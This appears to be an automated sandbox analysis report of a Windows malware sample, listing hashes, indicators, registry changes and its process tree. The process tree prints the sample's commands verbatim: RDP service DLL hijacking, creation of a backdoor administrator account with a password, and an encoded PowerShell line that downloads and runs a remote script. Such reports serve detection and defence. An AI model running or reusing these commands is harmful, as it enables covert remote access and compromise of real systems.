Analysis
-
max time kernel
57s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 11:31
Static task
static1
Behavioral task
behavioral1
Sample
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
Resource
win10v20201028
General
-
Target
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
-
Size
3.5MB
-
MD5
62e859cf533b93d38a05a2490b65fdf4
-
SHA1
85098ce68d91cd54795beca743c7de06b546997c
-
SHA256
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d
-
SHA512
3b90b0d2bc04c21be9b5330d5fccea3708b699c3fa054c90acf89e363ea8f97def8d2cb3ee938139596293e58ef727d27cda3add8c46caf8eddcd8b75494c479
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 23 2296 powershell.exe 25 2296 powershell.exe 26 2296 powershell.exe 27 2296 powershell.exe 29 2296 powershell.exe 31 2296 powershell.exe 33 2296 powershell.exe 35 2296 powershell.exe 37 2296 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 760 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1124 1124 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uar3d2vs.yqu.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB4F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB5F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB90.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_e2gabyxh.qor.ps1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFAE0.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB7F.tmp powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 760 powershell.exe 760 powershell.exe 760 powershell.exe 760 powershell.exe 760 powershell.exe 760 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe Token: 36 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe Token: 36 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe Token: 36 760 powershell.exe -
Suspicious use of WriteProcessMemory 72 IoCs
Processes:
8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3372 wrote to memory of 760 3372 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe powershell.exe PID 3372 wrote to memory of 760 3372 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe powershell.exe PID 760 wrote to memory of 3532 760 powershell.exe csc.exe PID 760 wrote to memory of 3532 760 powershell.exe csc.exe PID 3532 wrote to memory of 1332 3532 csc.exe cvtres.exe PID 3532 wrote to memory of 1332 3532 csc.exe cvtres.exe PID 760 wrote to memory of 2688 760 powershell.exe reg.exe PID 760 wrote to memory of 2688 760 powershell.exe reg.exe PID 760 wrote to memory of 2684 760 powershell.exe reg.exe PID 760 wrote to memory of 2684 760 powershell.exe reg.exe PID 760 wrote to memory of 4056 760 powershell.exe reg.exe PID 760 wrote to memory of 4056 760 powershell.exe reg.exe PID 760 wrote to memory of 2436 760 powershell.exe net.exe PID 760 wrote to memory of 2436 760 powershell.exe net.exe PID 2436 wrote to memory of 2580 2436 net.exe net1.exe PID 2436 wrote to memory of 2580 2436 net.exe net1.exe PID 760 wrote to memory of 2220 760 powershell.exe cmd.exe PID 760 wrote to memory of 2220 760 powershell.exe cmd.exe PID 2220 wrote to memory of 188 2220 cmd.exe cmd.exe PID 2220 wrote to memory of 188 2220 cmd.exe cmd.exe PID 188 wrote to memory of 520 188 cmd.exe net.exe PID 188 wrote to memory of 520 188 cmd.exe net.exe PID 520 wrote to memory of 2292 520 net.exe net1.exe PID 520 wrote to memory of 2292 520 net.exe net1.exe PID 760 wrote to memory of 68 760 powershell.exe cmd.exe PID 760 wrote to memory of 68 760 powershell.exe cmd.exe PID 68 wrote to memory of 940 68 cmd.exe cmd.exe PID 68 wrote to memory of 940 68 cmd.exe cmd.exe PID 940 wrote to memory of 1356 940 cmd.exe net.exe PID 940 wrote to memory of 1356 940 cmd.exe net.exe PID 1356 wrote to memory of 1344 1356 net.exe net1.exe PID 1356 wrote to memory of 1344 1356 net.exe net1.exe PID 2272 wrote to memory of 2068 2272 cmd.exe net.exe PID 2272 wrote to memory of 2068 2272 cmd.exe net.exe PID 2068 wrote to memory of 432 2068 net.exe net1.exe PID 2068 wrote to memory of 432 2068 net.exe net1.exe PID 1452 wrote to memory of 3356 1452 cmd.exe net.exe PID 1452 wrote to memory of 3356 1452 cmd.exe net.exe PID 3356 wrote to memory of 4088 3356 net.exe net1.exe PID 3356 wrote to memory of 4088 3356 net.exe net1.exe PID 4084 wrote to memory of 2456 4084 cmd.exe net.exe PID 4084 wrote to memory of 2456 4084 cmd.exe net.exe PID 2456 wrote to memory of 2228 2456 net.exe net1.exe PID 2456 wrote to memory of 2228 2456 net.exe net1.exe PID 1876 wrote to memory of 748 1876 cmd.exe net.exe PID 1876 wrote to memory of 748 1876 cmd.exe net.exe PID 748 wrote to memory of 2768 748 net.exe net1.exe PID 748 wrote to memory of 2768 748 net.exe net1.exe PID 2296 wrote to memory of 908 2296 cmd.exe net.exe PID 2296 wrote to memory of 908 2296 cmd.exe net.exe PID 908 wrote to memory of 2212 908 net.exe net1.exe PID 908 wrote to memory of 2212 908 net.exe net1.exe PID 2216 wrote to memory of 2684 2216 cmd.exe net.exe PID 2216 wrote to memory of 2684 2216 cmd.exe net.exe PID 2684 wrote to memory of 2044 2684 net.exe net1.exe PID 2684 wrote to memory of 2044 2684 net.exe net1.exe PID 4056 wrote to memory of 3452 4056 cmd.exe WMIC.exe PID 4056 wrote to memory of 3452 4056 cmd.exe WMIC.exe PID 1484 wrote to memory of 420 1484 cmd.exe WMIC.exe PID 1484 wrote to memory of 420 1484 cmd.exe WMIC.exe PID 3796 wrote to memory of 1788 3796 cmd.exe cmd.exe PID 3796 wrote to memory of 1788 3796 cmd.exe cmd.exe PID 1788 wrote to memory of 2296 1788 cmd.exe powershell.exe PID 1788 wrote to memory of 2296 1788 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe"C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7535.tmp" "c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uM6Ul3PI /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uM6Ul3PI /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uM6Ul3PI /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uM6Ul3PI1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uM6Ul3PI2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uM6Ul3PI3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
